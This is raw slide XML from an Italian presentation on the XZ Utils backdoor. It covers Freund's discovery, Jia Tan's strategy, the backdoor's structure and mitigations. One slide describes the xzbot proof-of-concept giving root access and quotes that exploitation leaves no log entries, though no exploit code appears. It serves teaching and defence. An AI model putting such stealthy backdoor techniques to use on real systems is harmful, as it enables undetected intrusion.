                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.....|
2024/03/30 00:00:00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>handshake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>failed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>: EOF</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379275004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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Struttura della backdoor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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11971957" cy="458587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800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xzbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> demo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> recupera il file e stampa su schermo il contenuto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=0(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=0(root) groups=0(root)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Questo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>proof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>-of-concept rivela che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> Tan aveva accesso con privilegi di amministratore sui sistemi operativi infetti. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Amlweems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> aggiunge inoltre: </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> generate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> INFO or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>higher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> log entries."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Le azioni illecite di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2328"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t> Tan sarebbero state, quindi, non solo autorizzate, ma anche invisibili.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2328"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260084131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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La scoperta di Andres Freund</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Tan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Struttura della backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Forme di mitigazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Cosa sappiamo oggi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22897634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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> Introduzione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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86033" y="1984142"/>
            <a:ext cx="12102895" cy="36009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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Linux Foundation: macro-struttura</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux si basa sulla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>toolchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> GNU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Torvalds Linux è lead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dello sviluppo kernel Linux;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zoë</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kooyman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chief</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>excecutive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nello sviluppo componenti GNU (Free Software Foundation);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>individui indipendenti sviluppano le componenti di terze parti non-GNU.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è una libreria open-source sviluppata da Lasse Collin a partire dal 2009.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
